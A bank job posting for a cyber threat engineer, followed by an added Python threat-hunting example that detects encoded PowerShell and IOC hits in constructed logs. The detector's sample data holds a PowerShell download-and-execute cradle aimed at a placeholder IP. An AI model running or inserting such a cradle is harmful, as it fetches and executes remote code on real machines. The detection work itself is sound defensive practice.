Talent.com
Cyber Security Engineer

RHB Bank, Kuala Lumpur, Malaysia
1 day ago
Job description

Overview: To be part of the Cyber Threat team as a tier 3 subject-matter expert and mentor to the SOC team. The role requires continuous detection, analysis, investigation, response and mitigation of advanced threats before they affect the bank's IT infrastructure, using a proven and documented cyber threat model such as the MITRE ATT&CK framework.

Qualifications

4 - 5 years of information security experience

1 - 2 years supporting incident response and/or investigations

Experience reviewing and assessing logs for anomalous activity indicating the presence of a threat

Knowledge and ability to identify threat actor attack methods and track their developments

Experience using threat models, e.g. the Cyber Kill Chain and MITRE ATT&CK

Extensive experience conveying complex information in simple, succinct explanations

Exceptional attention to detail

Strong technical writing skills

Extensive experience with analytical tradecraft

Thorough understanding of cybersecurity principles

Ability to work independently and build relationships

Efficient research methodologies

Ability to relate technical threats to business risks

Strong proficiency with scripting and programming languages (e.g. Python, PowerShell, Java, Node.js, Perl)

Strong communication and writing skills for reporting and analysis of cumulative findings

Key Responsibilities

Solution

Maintain the SIEM and related security solutions, including Splunk and Imperva (tasks include compliance with the patch and obsolescence framework requirements)

Ensure events and logs from all relevant devices are sent to the SIEM completely and accurately

Produce a monthly SIEM system health report covering log completeness and accuracy

Hunting

Perform threat hunting using industry-accepted methodologies, including hypothesis-driven investigation, IOC-driven investigation and machine-learning-assisted investigation

Analyze host data, network traffic, IDS/IPS/DLP events, packet captures, firewall logs and other relevant sources

Provide forensic analysis of network packet captures, DNS, proxy and NetFlow data, malware, host-based security and application logs, as well as logs from various types of security sensors

Identify gaps in the IT infrastructure by mimicking an attacker's behaviours and responses

Perform offensive validation of identified TTPs

Detection & Response

Continuously develop SIEM use cases mapped to the MITRE ATT&CK framework and driven by the current threat landscape

Onboard all use cases to the Security Operations Center for 24x7 monitoring and timely response

Continuously onboard new IOCs to the threat prevention solution so that known threats are blocked at all times

Continuously improve processes across multiple detection sets for more efficient security operations

Develop dashboards and reports that surface potential threats, suspicious or anomalous activity, malware, etc.

Assist in the design, evaluation, and implementation of new security technologies
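As an added illustration of the hunting and detection work listed above (this is example code written for this page, not code from RHB Bank or from the posting), the block below implements two small SIEM-style use cases, each tagged with the MITRE ATT&CK technique it covers: a hypothesis-driven hunt for Base64-encoded PowerShell (T1059.001) and an IOC-driven sweep of proxy records against an indicator list (T1071), followed by a simple per-host roll-up. The log records, field names, hostnames and indicators are all constructed for the example; 203.0.113.10 and the example.net domain are documentation ranges, not real indicators.

```python
import base64
import re
from typing import Optional

# --- Constructed sample data (illustrative only, not real telemetry) -------
ENCODED_PAYLOAD = base64.b64encode(
    "IEX (New-Object Net.WebClient).DownloadString('http://203.0.113.10/a.ps1')"
    .encode("utf-16-le")).decode()

# Sysmon-style process-creation events (hypothetical field names)
PROCESS_EVENTS = [
    {"ts": "2024-05-01T08:01:10Z", "host": "WS-0412", "user": "corp\\alice",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy Bypass -File C:\\scripts\\backup.ps1"},
    {"ts": "2024-05-01T08:02:33Z", "host": "WS-0412", "user": "corp\\alice",
     "image": "powershell.exe",
     "cmdline": "powershell.exe -nop -w hidden -enc " + ENCODED_PAYLOAD},
    {"ts": "2024-05-01T08:03:05Z", "host": "SRV-DB01", "user": "corp\\svc_sql",
     "image": "sqlservr.exe", "cmdline": "sqlservr.exe -sSQLEXPRESS"},
]

# Web-proxy events (hypothetical field names)
PROXY_EVENTS = [
    {"ts": "2024-05-01T08:02:34Z", "host": "WS-0412", "dest": "203.0.113.10"},
    {"ts": "2024-05-01T08:05:00Z", "host": "WS-0199", "dest": "www.example.com"},
    {"ts": "2024-05-01T08:06:41Z", "host": "WS-0412",
     "dest": "cdn.updates-cdn.example.net"},
]

# Constructed indicator list (what the threat-prevention feed would supply)
IOCS = {"203.0.113.10", "updates-cdn.example.net"}

# PowerShell accepts any unambiguous prefix of -EncodedCommand; require a
# plausible Base64 blob after it so ordinary switches like -w hidden don't fire.
ENC_FLAG = re.compile(r"(?i)(?:^|\s)-(?:e|ec|en|enc|encodedcommand)\s+([A-Za-z0-9+/=]{16,})")


def decode_powershell_arg(b64: str) -> Optional[str]:
    """-EncodedCommand carries UTF-16LE text; return None if it does not decode."""
    try:
        return base64.b64decode(b64, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def hunt_encoded_powershell(events):
    """Hypothesis: an intruder is launching encoded PowerShell (T1059.001)."""
    findings = []
    for ev in events:
        if "powershell" not in ev["image"].lower():
            continue
        m = ENC_FLAG.search(ev["cmdline"])
        if not m:
            continue
        findings.append({"technique": "T1059.001", "ts": ev["ts"],
                         "host": ev["host"], "user": ev["user"],
                         "decoded": decode_powershell_arg(m.group(1))})
    return findings


def match_ioc(dest: str, iocs) -> Optional[str]:
    """Exact or parent-domain match, case-insensitive, trailing dot ignored."""
    d = dest.lower().rstrip(".")
    for ioc in iocs:
        i = ioc.lower()
        if d == i or d.endswith("." + i):
            return ioc
    return None


def hunt_ioc_matches(events, iocs=IOCS):
    """IOC-driven: destinations on the indicator list (T1071)."""
    findings = []
    for ev in events:
        hit = match_ioc(ev["dest"], iocs)
        if hit:
            findings.append({"technique": "T1071", "ts": ev["ts"],
                             "host": ev["host"], "dest": ev["dest"], "ioc": hit})
    return findings


def run_hunts():
    """Run both use cases and return findings in time order."""
    return sorted(hunt_encoded_powershell(PROCESS_EVENTS) + hunt_ioc_matches(PROXY_EVENTS),
                  key=lambda f: f["ts"])


def hosts_with_multiple_techniques(findings):
    """Roll-up for triage: hosts where more than one technique was observed."""
    by_host = {}
    for f in findings:
        by_host.setdefault(f["host"], set()).add(f["technique"])
    return {h: sorted(t) for h, t in by_host.items() if len(t) > 1}


if __name__ == "__main__":
    for f in run_hunts():
        print(f)
    print(hosts_with_multiple_techniques(run_hunts()))
```

The roll-up is where a hunt turns into a case: a single encoded-PowerShell launch or a single IOC hit may each be benign, but the same workstation showing both within minutes is what an analyst escalates first.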
